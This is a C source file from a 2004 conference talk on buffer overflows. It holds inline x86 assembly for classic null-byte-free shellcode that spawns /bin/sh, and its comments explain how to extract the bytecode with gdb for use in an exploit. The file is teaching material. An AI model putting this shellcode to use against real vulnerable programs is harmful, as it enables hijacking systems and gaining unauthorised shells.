/*
 * Demonstrating Buffer Overflows
 *
 * Examples presented at the Grazer Linuxtage 2004
 *
 * Copyright (C) 2004 Thomas Winkler <tom@qwws.net>
 * Copyright (C) 2004 Markus Quaritsch <quam@qwws.net>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 */


/* 
 * This code is intended to get the bytecode for the assembler-instructions
 * listed below (spawning a shell and exit afterwards). Compile it and use a
 * debugger (e.g. gdb) to disassemble an extract the bytecode.
 *
 * This code is mainly the same as 'shellcodeasm.c' expect the instructions
 * containing 0x0-Bytes.
 *
 * It is not possible to execute this program because it modifies itself 
 * (writing 0x0 after the string '/bin/sh' which is not allowed in the 
 * text-segment.
 *
 * To find out the address offsets for the 'jmp' and 'call' instruction use an
 * debugger (e.g. gdb)
 */

int main() {
	asm(
"		jmp .+0x21					\n"
"		popl %esi					\n"
"		movl %esi, 0x8(%esi)		\n"
"		xorl %eax, %eax				\n"
"		movb %al, 0x7(%esi)			\n"
"		movl %eax, 0xc(%esi)		\n"
"		movb $0xb, %al				\n"
"		movl %esi, %ebx				\n"
"		leal 0x8(%esi), %ecx		\n"
"		leal 0xc(%esi), %edx		\n"
"		int $0x80					\n"
"		xorl %ebx, %ebx				\n"
"		movl %ebx, %eax				\n"
"		inc  %eax					\n"
"		int $0x80					\n"
"		call .-0x1f					\n"
".string \"/bin/sh\"				"
	   );
}
